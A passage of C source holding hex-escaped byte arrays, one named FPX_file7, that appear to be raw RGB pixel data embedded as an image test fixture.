-"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1" -"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6" -"\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9" -"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1" -"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6" -"\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9" -"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1" -"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6" -"\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9" 
-"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1" -"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6" -"\xe9\xf1\xd8\xd7\xd6\xff\xff\xff\xff\xff\xff\xed\xec\xec\xe5\xe8" -"\xef\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe8\xe8\xe8" -"\xec\xeb\xeb\xec\xeb\xea\xec\xeb\xea\xed\xed\xee\xec\xea\xe9\xec" -"\xeb\xeb\xed\xec\xec\xed\xec\xec\xed\xec\xec\xec\xea\xe9\xed\xec" -"\xed\xed\xed\xee\xec\xeb\xea\xed\xec\xed\xec\xec\xec\xea\xe9\xe8" -"\xea\xe7\xe4\xec\xea\xe9\xed\xed\xed\xec\xea\xe9\xec\xeb\xea\xed" -"\xec\xec\xec\xeb\xeb\xec\xec\xec\xec\xeb\xea\xed\xec\xed\xed\xed" -"\xee\xec\xeb\xeb\xed\xed\xef\xed\xec\xec\xed\xeb\xeb\xed\xec\xeb" -"\xe6\xe9\xf0\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe8\xf0\xe8\xe8\xec\xeb" -"\xe9\xe8\xec\xeb\xeb\xeb\xea\xea\xea\xe7\xe5\xec\xec\xed\xec\xea" -"\xea\xed\xec\xed\xed\xec\xed\xec\xeb\xeb\xec\xec\xec\xec\xeb\xec" -"\xec\xec\xec\xec\xeb\xeb\xeb\xea\xe9\xed\xec\xed\xeb\xe9\xe8\xec" -"\xeb\xeb\xec\xec\xed\xec\xeb\xec\xec\xeb\xec\xec\xeb\xea\xed\xec" -"\xee\xed\xec\xee\xec\xea\xe9\xec\xec\xed\xed\xec\xec\xeb\xe9\xe8" -"\xe9\xe6\xe4\xeb\xea\xe9\xec\xec\xed\xeb\xe9\xe9\xec\xeb\xeb\xec" -"\xec\xec\xec\xea\xea\xec\xec\xec\xec\xeb\xeb\xed\xec\xed\xed\xec" -"\xee\xec\xeb\xea\xed\xec\xed\xec\xec\xed\xec\xeb\xec\xeb\xea\xea" -"\xec\xeb\xeb\xed\xec\xee\xeb\xea\xea\xe5\xe6\xeb\xe6\xe9\xf1\xe6" -"\xe9\xf1\xd9\xd7\xd5\xff\xff\xff\xff\xff\xff\xed\xeb\xea\xe5\xe8" -"\xee\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xee\xeb\xe8" -"\xfa\xf9\xf7\xfb\xfb\xf9\xfc\xfb\xf9\xfc\xfc\xfb\xfc\xfa\xf8\xfb" -"\xfb\xfa\xfc\xfb\xfa\xfc\xfb\xfa\xfc\xfb\xfa\xfb\xfa\xf9\xfc\xfb" -"\xfa\xfb\xfb\xfa\xfb\xfa\xf9\xfc\xfb\xfa\xfb\xfa\xfa\xfe\xfe\xfe" -"\xfe\xfe\xfe\xfb\xfa\xf8\xf7\xf6\xf6\xf7\xf6\xf5\xfb\xfa\xf9\xfb" -"\xfb\xfa\xfb\xfa\xf9\xfc\xfb\xfa\xfb\xfb\xfa\xfc\xfb\xfb\xfc\xfb" -"\xfb\xfc\xfb\xf9\xfc\xfc\xfb\xfc\xfb\xfa\xfc\xfb\xfa\xfb\xfa\xf8" -"\xe5\xe7\xeb\xe6\xe9\xf1\xe6\xe9\xf1\xe5\xe8\xee\xec\xe9\xe6\xf9" 
-"\xf6\xf3\xfb\xfb\xf9\xff\xff\xff\xff\xff\xff\xfc\xfb\xfa\xfb\xfa" -"\xf8\xfc\xfb\xfa\xfc\xfb\xfa\xfb\xfa\xf9\xfb\xfa\xf9\xfb\xfb\xf9" -"\xfb\xfb\xfa\xfb\xfa\xf9\xfb\xfa\xf8\xfc\xfb\xf9\xfb\xf9\xf7\xfb" -"\xfa\xf8\xfb\xfb\xfa\xfb\xfa\xf9\xfb\xfb\xf9\xfb\xfa\xf9\xfc\xfb" -"\xfa\xfc\xfb\xfa\xfb\xfa\xf8\xfc\xfb\xfa\xfb\xfa\xf9\xfe\xfe\xfe" -"\xfe\xfe\xfe\xfb\xfa\xf8\xfb\xfa\xf9\xfa\xf9\xf8\xfb\xfa\xf9\xfb" -"\xfa\xf9\xfb\xfa\xf9\xfc\xfb\xfa\xfb\xfb\xf9\xfc\xfb\xfa\xfc\xfb" -"\xfa\xfc\xfa\xf8\xfc\xfb\xfa\xfc\xfb\xfa\xfb\xfb\xfa\xfb\xfa\xf9" -"\xfb\xfa\xf9\xfc\xfb\xfa\xfb\xfa\xf9\xe6\xe7\xea\xe6\xe9\xf1\xe6" -"\xe9\xf1\xd9\xd7\xd5\xff\xff\xff\xff\xff\xff\xed\xed\xed\xe5\xe8" -"\xef\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xf0\xee\xed" -"\xfd\xfd\xfc\xfb\xfb\xfb\xf2\xf2\xf2\xf9\xf9\xf9\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xf5\xf6\xf6\xe9\xea\xea\xec\xec" -"\xed\xdb\xdc\xdb\xdf\xe0\xe0\xea\xeb\xeb\xdb\xdb\xdb\xf1\xf1\xf1" -"\xfc\xfc\xfc\xd8\xd8\xd9\xcd\xce\xcf\xd0\xd1\xd2\xdb\xdc\xdc\xe0" -"\xe1\xe1\xe5\xe5\xe5\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfb\xfb" -"\xfb\xf5\xf5\xf5\xf1\xf1\xf1\xff\xff\xff\xff\xff\xff\xfe\xfe\xfd" -"\xe6\xe8\xed\xe6\xe9\xf1\xe6\xe9\xf1\xe5\xe8\xef\xee\xed\xed\xfc" -"\xfc\xfb\xff\xff\xff\xff\xff\xff\xfc\xfc\xfc\xf6\xf6\xf6\xfe\xfe" -"\xfe\xff\xff\xff\xff\xff\xff\xfa\xfa\xfb\xe6\xe6\xe7\xe8\xe8\xe9" -"\xe5\xe5\xe6\xdc\xdc\xdd\xe5\xe6\xe6\xdf\xdf\xdf\xdc\xdc\xdc\xdb" -"\xdb\xdc\xe5\xe6\xe6\xfa\xfa\xfa\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe1\xe1\xe1\xea\xea\xea" -"\xd9\xda\xd9\xe4\xe5\xe5\xe4\xe4\xe4\xdb\xdb\xdb\xe3\xe3\xe3\xde" -"\xde\xde\xf6\xf6\xf6\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xf2\xf2\xf2\xf3\xf3\xf3\xfa\xfa\xfa" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe7\xe8\xeb\xe6\xe9\xf1\xe6" -"\xe9\xf1\xd9\xd7\xd5\xff\xff\xff\xff\xff\xff\xef\xf1\xf6\xe6\xe9" -"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xf4\xf5\xf6" 
-"\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xf3\xea\xde\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xf7\xf8\xf8\xd2\xd3\xd3\xac\xad" -"\xad\xd6\xd6\xd6\xe1\xe1\xe2\xd2\xd2\xd2\xd4\xd5\xd6\xed\xed\xed" -"\xfa\xfa\xfa\xd1\xd1\xd1\xb4\xb5\xb4\xd3\xd3\xd3\xd7\xd7\xd7\xdf" -"\xe0\xe0\xdd\xde\xdd\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xf0\xf2\xf6\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xcf\xcf\xcf\xde\xde\xde" -"\xb3\xb3\xb2\xd5\xd6\xd5\xcf\xcf\xcf\xd1\xd1\xd1\xcf\xcf\xcf\xee" -"\xef\xee\xd6\xd6\xd6\xf5\xf6\xf6\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xdc\xdc\xdc\xe7\xe7\xe7" -"\xe5\xe5\xe6\x98\x9a\x9b\xdc\xdc\xdc\xee\xef\xee\xdf\xdf\xdf\xd5" -"\xd5\xd6\xf9\xf9\xf9\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe4\xe7\xeb\xe6\xe9\xf1\xe6" -"\xe9\xf1\xd6\xcd\xc1\xff\xff\xff\xff\xff\xff\xe5\xdc\xd1\xe6\xe9" -"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xec\xe4\xdc" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfb\xf8\xf4\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfb\xfc" -"\xfc\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xfb\xfb\xfb\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xe5\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xdd\xd0\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf8\xf8\xf8\xff\xff\xff" -"\xfa\xfb\xfc\xff\xff\xff\xfc\xfc\xfc\xfb\xfb\xfb\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xf9\xf9\xf9\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe6\xe9\xf1\xe6\xe9\xf1\xe6" -"\xe9\xf1\xdb\xdd\xe1\xff\xff\xff\xff\xff\xff\xee\xec\xec\xe5\xe8" -"\xef\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xf1\xf0\xef" -"\xfd\xfd\xfc\xff\xff\xff\xff\xff\xff\xfb\xf7\xf3\xf2\xe7\xd9\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfd\xfd" -"\xfb\xfc\xfa\xf7\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xfe\xfe\xfd" -"\xe6\xe8\xec\xe6\xe9\xf1\xe6\xe9\xf1\xe5\xe8\xee\xed\xec\xeb\xfc" -"\xfb\xfa\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf7\xf1\xe8\xf5\xed" -"\xe2\xfd\xfc\xfb\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xfa\xf6\xf0\xfd\xfb\xf9\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xfd\xfc\xfa\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xfe\xfe\xfe\xfc\xfb\xf9\xfe\xfe\xfe\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe7\xe7\xe9\xe6\xe9\xf1\xe6" -"\xe9\xf1\xd8\xd5\xd3\xff\xff\xff\xff\xff\xff\xed\xec\xec\xe5\xe8" -"\xef\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xf0\xee\xee" -"\xfd\xfd\xfc\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfc\xfa\xf8\xfc" -"\xfb\xf9\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xee\xdf\xca" -"\xe5\xcb\xa8\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfa\xf6" -"\xf1\xfb\xf8\xf5\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfd\xfd" -"\xe5\xe7\xec\xe6\xe9\xf1\xe6\xe9\xf1\xe5\xe8\xef\xee\xed\xed\xfc" -"\xfc\xfb\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfc\xf9" -"\xf6\xf9\xf5\xf0\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xea\xd8\xbf\xe7\xd2\xb6\xfd\xfc\xfa\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xec\xdb\xc5\xfe\xfe\xfd\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe" -"\xfe\xfd\xfc\xfa\xf9\xf5\xf0\xfc\xfa\xf8\xfe\xfe\xfe\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe7\xe7\xea\xe6\xe9\xf1\xe6" -"\xe9\xf1\xd8\xd6\xd3\xff\xff\xff\xff\xff\xff\xed\xec\xec\xe5\xe8" -"\xef\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xed\xeb\xea" -"\xfc\xfb\xfa\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xf3" -"\xea\xdd\xfe\xfd\xfd\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xee\xdf\xca" -"\xe5\xcb\xa8\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfd\xf4\xec" -"\xe1\xfe\xfe\xfd\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfd\xfd\xfc" -"\xe6\xe7\xec\xe6\xe9\xf1\xe6\xe9\xf1\xe5\xe8\xef\xeb\xeb\xeb\xf9" -"\xf8\xf6\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xf9\xf4\xee\xfa\xf7\xf2\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xf6\xee\xe3\xe0\xc4\x9e\xf5\xec\xe1\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xfa\xf6\xf1\xf6\xf0\xe6\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf9\xf5" -"\xef\xf1\xe6\xd7\xfb\xf8\xf4\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
-"\xff\xff\xff\xff\xff\xff\xfd\xfc\xfb\xe7\xe9\xee\xe6\xe9\xf1\xe6" -"\xe9\xf1\xd9\xd7\xd6\xff\xff\xff\xff\xff\xff\xed\xec\xeb\xe5\xe8" -"\xef\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe8\xe8\xeb" -"\xf4\xf2\xee\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xf4" -"\xed\xe2\xfd\xfc\xfa\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xee\xdf\xca" -"\xe5\xcb\xa8\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfd\xfc\xfb\xf8\xf3" -"\xec\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xf9\xf7\xf5" -"\xe3\xe3\xe5\xe4\xe6\xec\xe5\xe8\xf0\xe6\xe9\xf1\xe6\xe8\xed\xed" -"\xeb\xe9\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xfe\xfd\xfc\xfa\xf6\xf0\xfd\xfc\xfb\xfe\xfe\xfe\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xfd\xfb\xf9\xe4\xcc\xac\xe7\xd1\xb3\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xe9\xd6\xbb\xfd\xfc\xfa\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xf6\xf0" -"\xe7\xf5\xed\xe1\xfd\xfd\xfb\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xfe\xfe\xfe\xfb\xfa\xf8\xf2\xf2\xf0\xe5\xe8\xee\xe6\xe9\xf1\xe6" -"\xe9\xf1\xd9\xd7\xd5\xff\xff\xff\xff\xff\xff\xec\xea\xe8\xe5\xe7" -"\xee\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1" -"\xe6\xe7\xeb\xef\xed\xec\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xfc" -"\xfa\xf7\xf0\xe4\xd3\xf7\xf1\xe9\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xee\xdf\xca" -"\xe5\xcb\xa8\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xf9\xf4\xee\xf0\xe4\xd3\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xfd\xfd\xfc\xf3\xf2\xf0\xe2\xdd\xd6" -"\xda\xcc\xb9\xdc\xd0\xc1\xe4\xe6\xec\xdd\xd5\xc9\xda\xcc\xb6\xde" -"\xd6\xcb\xf0\xee\xec\xfc\xfb\xf8\xff\xff\xff\xff\xff\xff\xff\xff" 
-"\xff\xff\xff\xff\xfc\xfa\xf7\xf3\xe8\xda\xf9\xf3\xec\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfc\xfa\xf8\xe6\xd0\xb2\xfe" -"\xfe\xfd\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfd\xfd\xf0\xe5\xd5" -"\xd8\xb3\x82\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfd\xfb\xf9\xf3\xe9\xdd\xfe\xfd" -"\xfd\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfd\xfd" -"\xed\xeb\xe9\xe7\xe8\xec\xe5\xe8\xf0\xe6\xe9\xf1\xe6\xe9\xf1\xe6" -"\xe9\xf1\xd8\xd6\xd5\xff\xff\xff\xff\xff\xff\xed\xec\xec\xe5\xe8" -"\xef\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1" -"\xe5\xe8\xf0\xe8\xe8\xeb\xfe\xfd\xfd\xff\xff\xff\xff\xff\xff\xfe" -"\xfe\xfe\xf9\xf4\xee\xf9\xf5\xef\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xee\xdf\xca" -"\xe5\xcb\xa8\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -; - -unsigned char FPX_file7[] = -"\xff\xff\xff\xff\xff\xfe\xfe\xfe\xf9\xf4\xee\xf7\xf0\xe8\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xf7\xf5\xf3\xe8\xe6\xe3\xdc\xd4\xc6" -"\xe1\xdf\xde\xe2\xe0\xe1\xe5\xe8\xee\xde\xd6\xcc\xd7\xc5\xaa\xd9" -"\xca\xb3\xe5\xe4\xe5\xf2\xf1\xf0\xfe\xfe\xfe\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xfe\xfe\xfe\xfd\xfc\xfb\xf9\xf5\xef\xfd\xfc\xfb" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xef\xe2\xd0\xfa" -"\xf6\xf1\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfa\xf6\xf0\xd1\xa7\x6d" -"\xf9\xf5\xef\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xf6\xf0\xe7\xf7\xf1\xe9\xfc\xfb\xf9\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfd\xfd\xfc\xf7\xf5\xf3" -"\xe6\xe8\xee\xe5\xe8\xf0\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6" -"\xe9\xf1\xd8\xd6\xd4\xff\xff\xff\xff\xff\xff\xec\xea\xe9\xe5\xe7" -"\xee\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1" 
-"\xe6\xe9\xf1\xe5\xe7\xed\xf8\xf7\xf5\xfe\xfe\xfe\xff\xff\xff\xff" -"\xff\xff\xfe\xfe\xfe\xf7\xf1\xea\xfe\xfe\xfd\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xee\xdf\xca" -"\xe5\xcb\xa8\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xf8\xf4\xed\xf8\xf3\xec\xfe\xfe\xfd\xff\xff" -"\xff\xff\xff\xff\xfe\xfe\xfe\xed\xec\xeb\xdf\xd9\xd1\xd9\xcb\xb5" -"\xe3\xe4\xe7\xe6\xe9\xf1\xe6\xe9\xf1\xe3\xe2\xe4\xde\xd6\xcb\xda" -"\xcd\xb9\xe1\xde\xda\xe6\xe9\xf1\xe8\xe0\xd3\xfe\xfe\xfe\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfa\xf7\xf2\xf8\xf4\xed" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf9\xf5\xef\xf0" -"\xe3\xd0\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf0\xe3\xd1\xdb\xbc\x91" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xfe\xfe\xfe\xf0\xe5\xd6\xf8\xf3\xec\xfe\xfe\xfe\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xfd\xfd\xfc\xf3\xf1\xed\xe9\xea\xeb" -"\xe5\xe8\xf0\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6" -"\xe9\xf1\xd9\xd7\xd6\xff\xff\xff\xff\xff\xff\xec\xeb\xea\xe5\xe8" -"\xee\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1" -"\xe6\xe9\xf1\xe6\xe9\xf1\xe8\xe9\xec\xf4\xf3\xf1\xfe\xfe\xfe\xff" -"\xff\xff\xff\xff\xff\xfe\xfd\xfc\xfb\xf8\xf5\xfe\xfd\xfd\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xee\xdf\xca" -"\xe5\xcb\xa8\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xfe\xfe\xfe\xf9\xf4\xee\xfd\xfb\xf9\xff\xff\xff\xff\xff" -"\xff\xfe\xfe\xfe\xf5\xf3\xf0\xdd\xd6\xcb\xda\xce\xbc\xde\xd7\xce" -"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe4" -"\xe7\xed\xd8\xca\xb5\xd7\xc9\xb4\xe2\xe1\xe0\xf1\xef\xed\xfb\xfa" -"\xf8\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfa\xf6\xf1" -"\xf0\xe4\xd4\xfa\xf6\xf0\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe1" -"\xc7\xa2\xf3\xe9\xdb\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff" 
-"\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xe2\xc7\xa4\xfd\xfb\xf9" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xf7" -"\xf2\xea\xf0\xe5\xd5\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xfa\xf7\xf4\xe6\xe7\xeb\xe5\xe8\xef\xe6\xe9\xf1" -"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6" -"\xe9\xf1\xd9\xd8\xd7\xff\xff\xff\xff\xff\xff\xed\xec\xec\xe5\xe8" -"\xef\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1" -"\xe6\xe9\xf1\xe6\xe9\xf1\xe5\xe7\xee\xeb\xeb\xed\xf8\xf6\xf3\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xf2\xe7\xda\xf8\xf4\xed\xfe\xfe" -"\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xee\xdf\xca" -"\xe5\xcb\xa8\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xfb\xf8\xf3\xfc\xfa\xf8\xff\xff\xff\xff\xff\xff\xfe\xfe" -"\xfe\xf9\xf7\xf3\xec\xec\xec\xda\xd0\xc1\xdd\xd6\xcd\xe3\xe5\xe8" -"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe5" 